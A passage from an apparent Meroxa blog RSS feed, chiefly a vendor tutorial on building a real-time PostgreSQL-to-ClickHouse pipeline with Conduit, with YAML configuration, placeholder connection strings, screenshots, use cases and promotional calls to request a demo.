&lt;p&gt;Once your pipeline is running, you can visit &lt;a href=&quot;http://localhost:8080/ui&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;http://localhost:8080/ui&lt;/code&gt;&lt;/a&gt;. You will see your pipeline defined there, and you can inspect the stream to watch records flowing in real time from MongoDB to ClickHouse.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;By following these steps, you can easily set up a real-time data streaming pipeline from MongoDB to ClickHouse using Conduit. This allows you to leverage the best of both worlds—MongoDB’s flexible data model and ClickHouse’s powerful analytics capabilities. With minimal setup, you can move large amounts of data efficiently and gain actionable insights in real time, making it perfect for organizations looking to optimize their data workflows.&lt;/p&gt;
&lt;p&gt;Click &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;here&lt;/a&gt; to schedule a demo today! Stay tuned for future blogs, where we’ll dive deeper into advanced transformations and optimizations you can apply within your streaming pipelines!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Building Real-Time Analytics Dashboards with Conduit, Postgres and Clickhouse]]></title><description><![CDATA[ClickHouse has established itself as a prominent database for analytical applications due to its technical advantages over competitors like Druid, Pinot, and StarRocks.]]></description><link>https://meroxa.com/blog/building-real-time-analytics-dashboards-with-conduit-postgres-and-clickhouse</link><guid isPermaLink="false">https://meroxa.com/blog/building-real-time-analytics-dashboards-with-conduit-postgres-and-clickhouse</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Mon, 26 Aug 2024 20:32:32 GMT</pubDate><content:encoded>&lt;p&gt;In today&apos;s fast-paced business world, staying competitive and agile is more important than ever. Real-time analytics have become essential for companies looking to keep up with rapid changes and make informed decisions quickly. These analytics provide immediate insights into business operations, customer behavior, and market trends, enabling organizations to respond with speed and precision.&lt;/p&gt;
&lt;p&gt;However, while there are many tools available for querying and analyzing data, getting that data into a format that’s easy to work with can still be a major hurdle. Many teams find themselves juggling multiple vendors to handle data ingestion, cleansing, augmentation, orchestration, streaming, and storage. This can be both costly and complicated.&lt;/p&gt;
&lt;p&gt;In this post, we’ll guide you through how to simplify this process using Meroxa’s Conduit Platform. We’ll show you how to build real-time analytics dashboards by pulling data from Postgres, processing it with Clickhouse, and displaying the results in Grafana. This approach streamlines your data pipeline, making it easier and more efficient to gain the insights your business needs.&lt;/p&gt;
&lt;h2&gt;Why Are Teams Choosing Clickhouse for Analytics?&lt;/h2&gt;
&lt;p&gt;ClickHouse has established itself as a prominent database for analytical applications due to its technical advantages over competitors like Druid, Pinot, and StarRocks. Its columnar storage engine and vectorized query execution enable efficient data compression and parallel processing, resulting in superior query performance on large datasets. ClickHouse&apos;s architecture supports both batch and streaming data ingestion, offering flexibility that surpasses Druid and Pinot, which are optimized for specific workloads. The database&apos;s ACID compliance and support for materialized views further enhance its capabilities for real-time analytics.&lt;/p&gt;
&lt;p&gt;Compared to Druid, ClickHouse offers more comprehensive SQL support and a simpler architecture, reducing operational complexity. While Pinot excels in low-latency queries, ClickHouse provides better write throughput and more extensive analytical functions. StarRocks, though competitive, lacks the maturity and extensive ecosystem of ClickHouse. ClickHouse&apos;s ability to handle diverse data models, including nested structures, and its support for various index types (e.g., skip indexes, primary key indexes) contribute to its versatility.&lt;/p&gt;
&lt;p&gt;Furthermore, ClickHouse&apos;s distributed architecture allows for horizontal scaling, enabling it to process petabytes of data across clusters. Its support for approximate query processing techniques, like reservoir sampling and HyperLogLog, facilitates efficient analytics on massive datasets. These technical features, combined with its active open-source community and growing ecosystem of tools, position ClickHouse as a robust choice for building scalable and high-performance analytical applications.&lt;/p&gt;
&lt;h3&gt;Step-by-Step Guide to Setting Up a PostgreSQL to ClickHouse Pipeline Using Meroxa Conduit&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Download Conduit Binary:&lt;/strong&gt; Follow the Conduit &lt;a href=&quot;https://conduit.io/docs/getting-started/installing-and-running/&quot;&gt;Quickstart&lt;/a&gt; to download and install the Conduit binary on your local machine.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Download &amp;#x26; Install Connectors&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;PostgreSQL Connector&lt;/strong&gt;: &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-postgres&quot;&gt;Conduit PostgreSQL Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ClickHouse Connector&lt;/strong&gt;: &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-clickhouse&quot;&gt;Conduit ClickHouse Connector&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Refer to &lt;a href=&quot;https://conduit.io/docs/connectors/installing&quot;&gt;Installing Connectors&lt;/a&gt; for more information.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/3837d1b1bfb84bda2efd7a513c9790ce/e8950/Screenshot_2024-08-26_at_3.30.20_PM.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 23.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAABYlAAAWJQFJUiTwAAABHUlEQVR42kVQ11LCUBDlUREVAimEEFJveickdEHG//+j4yHjjA87O9tO2VGY7hEmHeL8MESUHWB6DZR1Ct0uoDIbTgXLb2CwNoZeAn1TYLYMuVtDMRK8zmy8zV2MpGUAEXeQVzGy+oSFHsEOWhTbK9L6DJH1KJoLew0kAsw5T4oTAt6oZopu/4Atmn/AmRog54LGYbm9QTbSgbXu7sgJGGZ7VO2NijK8Lzx8KD7S8kw3RyypstndsaCYl6mFyQCoCJTVBbqVY9s/4Cc9LCqs+28SXOGGLQG/4MctwQQ+GXl1RkLANYm74w8s5rHk/FnWBDT+ZMKGG+2w4o80M4NFG6Zbss6x8WuyO4OCZ5huBZnWp6qAF7WD+vHTsuTgF1x3j/T2egRjAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Example PostgreSQL table with user purchases data.&quot;
        title=&quot;&quot;
        src=&quot;/static/3837d1b1bfb84bda2efd7a513c9790ce/5a190/Screenshot_2024-08-26_at_3.30.20_PM.png&quot;
        srcset=&quot;/static/3837d1b1bfb84bda2efd7a513c9790ce/772e8/Screenshot_2024-08-26_at_3.30.20_PM.png 200w,
/static/3837d1b1bfb84bda2efd7a513c9790ce/e17e5/Screenshot_2024-08-26_at_3.30.20_PM.png 400w,
/static/3837d1b1bfb84bda2efd7a513c9790ce/5a190/Screenshot_2024-08-26_at_3.30.20_PM.png 800w,
/static/3837d1b1bfb84bda2efd7a513c9790ce/c1b63/Screenshot_2024-08-26_at_3.30.20_PM.png 1200w,
/static/3837d1b1bfb84bda2efd7a513c9790ce/29007/Screenshot_2024-08-26_at_3.30.20_PM.png 1600w,
/static/3837d1b1bfb84bda2efd7a513c9790ce/e8950/Screenshot_2024-08-26_at_3.30.20_PM.png 2000w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Example PostgreSQL table with user purchases data.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Provision Secrets for PostgreSQL and ClickHouse&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;PostgreSQL Connection String:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;postgres://&amp;lt;username&amp;gt;:&amp;lt;password&amp;gt;@&amp;lt;host&amp;gt;:&amp;lt;port&amp;gt;/&amp;lt;database&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ClickHouse Connection String:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;https://&amp;lt;username&amp;gt;:&amp;lt;password&amp;gt;@&amp;lt;host&amp;gt;:&amp;lt;port&amp;gt;/&amp;lt;database&amp;gt;?secure=true&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Set Up Your Conduit Pipeline YAML&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Example YAML Configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;&lt;span class=&quot;token literal-property property&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;
&lt;span class=&quot;token literal-property property&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt; id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; pg&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;to&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;ch
    &lt;span class=&quot;token literal-property property&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token literal-property property&quot;&gt;description&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;
      This pipeline showcases real&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;time data streaming from Postgres to ClickHouse&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
    &lt;span class=&quot;token literal-property property&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
# &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;CONNECTOR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;SOURCE&lt;/span&gt;
      &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt; id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; pg&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token literal-property property&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token literal-property property&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;postgres
        &lt;span class=&quot;token literal-property property&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres://yourusername:yourpassword@yourhost:5432/yourdatabase&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;tables&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;user_purchases&quot;&lt;/span&gt;
# &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;CONNECTOR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;DESTINATION&lt;/span&gt;
      &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt; id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; clickhouse&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;sink
        &lt;span class=&quot;token literal-property property&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token literal-property property&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;clickhouse
        &lt;span class=&quot;token literal-property property&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;https://yourusername:yourpassword@yourhost:8443/yourdatabase?secure=true&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;user_purchases&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;keyColumns&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
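The two connection strings used above follow a fixed shape; if you template them in code rather than pasting them by hand, a sketch like this keeps the pieces straight (helper names are ours, for illustration only):

```python
def pg_dsn(user, pwd, host, port, db):
    # Standard PostgreSQL DSN: postgres://user:pass@host:port/database
    return f"postgres://{user}:{pwd}@{host}:{port}/{db}"

def clickhouse_dsn(user, pwd, host, port, db):
    # secure=true enables TLS for HTTPS ClickHouse endpoints.
    return f"https://{user}:{pwd}@{host}:{port}/{db}?secure=true"

pg = pg_dsn("yourusername", "yourpassword", "yourhost", 5432, "yourdatabase")
ch = clickhouse_dsn("yourusername", "yourpassword", "yourhost", 8443, "yourdatabase")
```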
&lt;p&gt;&lt;strong&gt;Explanation of YAML Components&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;pipelines&lt;/strong&gt;: Defines the pipeline configuration.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;id&lt;/strong&gt;: Unique identifier for the pipeline.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;status&lt;/strong&gt;: Defines the pipeline’s status (running/stopped).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;description&lt;/strong&gt;: A brief description of the pipeline’s purpose.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;connectors&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Source connector (pg-source)&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;type&lt;/strong&gt;: Specifies the connector type (source).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;plugin&lt;/strong&gt;: The plugin to use (PostgreSQL).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;settings&lt;/strong&gt;: Contains the PostgreSQL connection settings.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Destination connector (clickhouse-sink)&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;type&lt;/strong&gt;: Specifies the connector type (destination).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;plugin&lt;/strong&gt;: The plugin to use (ClickHouse).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;settings&lt;/strong&gt;: Contains the ClickHouse connection settings.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
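Putting those components together, a quick structural check of the parsed YAML can catch typos before you start Conduit. This is our own sanity-check sketch over the dict the YAML parses into, not Conduit's actual validation logic:

```python
def check_pipeline(cfg):
    # Returns a list of problems; an empty list means the basic shape looks right.
    problems = []
    for p in cfg.get("pipelines", []):
        for key in ("id", "status", "connectors"):
            if key not in p:
                problems.append(f"pipeline missing '{key}'")
        for c in p.get("connectors", []):
            if c.get("type") not in ("source", "destination"):
                problems.append(f"connector {c.get('id')}: bad type")
            for key in ("plugin", "settings"):
                if key not in c:
                    problems.append(f"connector {c.get('id')}: missing '{key}'")
    return problems

cfg = {
    "pipelines": [{
        "id": "pg-to-ch",
        "status": "running",
        "connectors": [
            {"id": "pg-source", "type": "source",
             "plugin": "standalone:postgres", "settings": {"tables": "user_purchases"}},
            {"id": "clickhouse-sink", "type": "destination",
             "plugin": "standalone:clickhouse", "settings": {"table": "user_purchases"}},
        ],
    }]
}
```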
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Run the Pipeline:&lt;/strong&gt;
&lt;ol&gt;
&lt;li&gt;Navigate to the directory containing your YAML file and run Conduit with the following command:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;./conduit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/fb154251bb6705696502814163481afd/e8950/Screenshot_2024-08-26_at_3.30.59_PM.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAABYlAAAWJQFJUiTwAAABE0lEQVR42l2S3Y6EIAyFef9Xmr3TzF4aH0OTAREEAfVsT43JZkialv58tFXjvUfOGSllXNeFWqvqvBes64pt23CeJ2JMCCFi33cUyTmOQ/3UF4BSinLMNE1yqViWBX3fYxgGjOMIt3h4HwRQUCXOAublvIt/VYlxg7NOm2EeY2aeZ/AQ+Hr9oOs6vN+/mD4rbKiIuerLLF4EEkRrA2J/BGZFeCeUtnHOKfAeK2onMjN20a019dda1B9CEHiSMZuuw1qrNTxcFe8mpaQO7oJBBgjhrlq790QYYwRS8yEC2Qzlyef3MAzyI1D+n28gx2YBhTWEP1A2w0ZomwfwDeSCWfgk0+aenVtu4Bp0RP4FrGUDfOAPOUgdmDF6VucAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Example data being transferred from PostgreSQL into ClickHouse.&quot;
        title=&quot;&quot;
        src=&quot;/static/fb154251bb6705696502814163481afd/5a190/Screenshot_2024-08-26_at_3.30.59_PM.png&quot;
        srcset=&quot;/static/fb154251bb6705696502814163481afd/772e8/Screenshot_2024-08-26_at_3.30.59_PM.png 200w,
/static/fb154251bb6705696502814163481afd/e17e5/Screenshot_2024-08-26_at_3.30.59_PM.png 400w,
/static/fb154251bb6705696502814163481afd/5a190/Screenshot_2024-08-26_at_3.30.59_PM.png 800w,
/static/fb154251bb6705696502814163481afd/c1b63/Screenshot_2024-08-26_at_3.30.59_PM.png 1200w,
/static/fb154251bb6705696502814163481afd/29007/Screenshot_2024-08-26_at_3.30.59_PM.png 1600w,
/static/fb154251bb6705696502814163481afd/e8950/Screenshot_2024-08-26_at_3.30.59_PM.png 2000w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Example data being transferred from PostgreSQL into ClickHouse.&lt;/p&gt;
&lt;p&gt;This will automatically execute any pipeline files located in the &lt;code class=&quot;language-text&quot;&gt;./pipelines&lt;/code&gt; directory.&lt;/p&gt;
&lt;p&gt;Access the Conduit UI at &lt;code class=&quot;language-text&quot;&gt;localhost:8080&lt;/code&gt; to monitor and manage the pipeline.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/557bf9d478dc7dbf72550dbe1ff98285/e8950/Screenshot_2024-08-26_at_3.58.57_PM.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 40%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAABYlAAAWJQFJUiTwAAABHUlEQVR42pWQTU7DMBCFcxXECtixQOy65gDcgQOwYcORQNyAE9ANQhUrhIqSkqSO45/Yjt3H2CWl0AhEpKdJ7Jlv8l52cXkNIRXCaoXee1BBCOv3MfkQ6D7A+wDb9+icg6M63GeTs3Ms3msY2+N1nuPx6Rl5UUKqjhbpHTVNi3rZwJket9MHXN3d4H42g6d5LhSyw+NJAnbGoawY5m8FqpqhpcufUN5KNFykKum7JPDLokTJmk1vtndwkoC6s5+DKlmI1pI9ymAQbwWMsYiPI3uVEHBkWemvxdn+0ekGGLczsqQ7k5qMXeczSCpNZ5by81BUp0UO6yhHmm3FCDDCloynvxzLb1vRstF25/wbMDUq/SdsUMz5V+BYw3/1ASSdVuS5lWodAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Conduit UI showcasing the pipelines currently running. You can have as many pipelines as you want here.&quot;
        title=&quot;&quot;
        src=&quot;/static/557bf9d478dc7dbf72550dbe1ff98285/5a190/Screenshot_2024-08-26_at_3.58.57_PM.png&quot;
        srcset=&quot;/static/557bf9d478dc7dbf72550dbe1ff98285/772e8/Screenshot_2024-08-26_at_3.58.57_PM.png 200w,
/static/557bf9d478dc7dbf72550dbe1ff98285/e17e5/Screenshot_2024-08-26_at_3.58.57_PM.png 400w,
/static/557bf9d478dc7dbf72550dbe1ff98285/5a190/Screenshot_2024-08-26_at_3.58.57_PM.png 800w,
/static/557bf9d478dc7dbf72550dbe1ff98285/c1b63/Screenshot_2024-08-26_at_3.58.57_PM.png 1200w,
/static/557bf9d478dc7dbf72550dbe1ff98285/29007/Screenshot_2024-08-26_at_3.58.57_PM.png 1600w,
/static/557bf9d478dc7dbf72550dbe1ff98285/e8950/Screenshot_2024-08-26_at_3.58.57_PM.png 2000w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Conduit UI showcasing the pipelines currently running. You can have as many pipelines as you want here.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/1b1f32e5ef9345bed5221389db55fa18/e8950/Screenshot_2024-08-26_at_3.59.36_PM.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 29.500000000000004%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAABYlAAAWJQFJUiTwAAABCklEQVR42p2R626CQBSEff9Xq1HwUiwqsKJopUUEQ9W9fD1LNLF/O8lkNjnJMDMMvsqaU9ViDeg7dJ1mmeQMg4jR5INwFjOZL3sG8h5PY96CdxK1o6pq2ssFay3OOoxxDL6PHbmSw9kJ4dKA2hxR6pOiqJgtMobTRc/FSlEcjuz2JWp74Ny0nGoJdG7QWuOcGGptaFv/FYn4gNociFc5abZnFiWM55JM0kVxRropWGdbMlGPuxjVYuzVY8AL3EPXasswjKTeB4FUDR98Vva3VZpzvd9opPK+LGm7jp/b7a/hE36fkZiFL2av9Lck22GlYne9UjVNr8aYfxrKz0pV0W/mqxqZzU9nreMXodO/3ioMmaEAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Example Conduit pipeline showcasing the connectors used and the ability to inspect the data stream.&quot;
        title=&quot;&quot;
        src=&quot;/static/1b1f32e5ef9345bed5221389db55fa18/5a190/Screenshot_2024-08-26_at_3.59.36_PM.png&quot;
        srcset=&quot;/static/1b1f32e5ef9345bed5221389db55fa18/772e8/Screenshot_2024-08-26_at_3.59.36_PM.png 200w,
/static/1b1f32e5ef9345bed5221389db55fa18/e17e5/Screenshot_2024-08-26_at_3.59.36_PM.png 400w,
/static/1b1f32e5ef9345bed5221389db55fa18/5a190/Screenshot_2024-08-26_at_3.59.36_PM.png 800w,
/static/1b1f32e5ef9345bed5221389db55fa18/c1b63/Screenshot_2024-08-26_at_3.59.36_PM.png 1200w,
/static/1b1f32e5ef9345bed5221389db55fa18/29007/Screenshot_2024-08-26_at_3.59.36_PM.png 1600w,
/static/1b1f32e5ef9345bed5221389db55fa18/e8950/Screenshot_2024-08-26_at_3.59.36_PM.png 2000w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Example Conduit pipeline showcasing the connectors used and the ability to inspect the data stream.&lt;/p&gt;
&lt;h3&gt;Use Cases for PostgreSQL to ClickHouse CDC&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Financial Services&lt;/strong&gt;: Real-time fraud detection and transaction monitoring become seamless with up-to-date data flowing from PostgreSQL to ClickHouse.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;E-commerce&lt;/strong&gt;: Enhance customer experience by providing real-time product recommendations and personalized marketing based on the latest data.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;IoT Applications&lt;/strong&gt;: Process and analyze massive streams of IoT data in real time, enabling predictive maintenance and operational efficiency.&lt;/p&gt;
&lt;h3&gt;Best Practices for Implementing CDC with Meroxa&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Plan Your Data Flow&lt;/strong&gt;: Understand your data sources and destinations, and plan the flow of data to ensure optimal performance.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automate Data Transformations&lt;/strong&gt;: Use Meroxa’s transformation features to automate data cleaning and preparation, ensuring high-quality data in ClickHouse.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monitor Continuously&lt;/strong&gt;: Regularly monitor your CDC pipelines to identify and resolve any issues promptly, ensuring uninterrupted data flow.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;Implementing PostgreSQL to ClickHouse CDC with Meroxa&apos;s Conduit Platform provides a powerful solution for real-time data integration and analytics. By leveraging Meroxa&apos;s robust platform, businesses can ensure data consistency, scalability, and ease of use, empowering them to make data-driven decisions with confidence. Stay tuned for part 2, where we show you how to stream data from MongoDB into ClickHouse.&lt;/p&gt;
&lt;p&gt;Ready to transform your data integration process? &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Request a demo&lt;/a&gt; of Meroxa&apos;s Conduit Platform today and see how you can seamlessly integrate PostgreSQL with ClickHouse for real-time analytics and insights. Check out the full demo &lt;a href=&quot;https://youtu.be/UW4OxcRuOxQ?feature=shared&quot;&gt;video&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit v0.11 Unveils Powerful Schema Support for Enhanced Data Integration]]></title><description><![CDATA[We made it, Conduit v0.11 is here! In this latest release, we’ve focused on adding schema support, enabling you to detect schema changes and retain type information end-to-end. ]]></description><link>https://meroxa.com/blog/conduit-v011-unveils-powerful-schema-support-for-enhanced-data-integration</link><guid 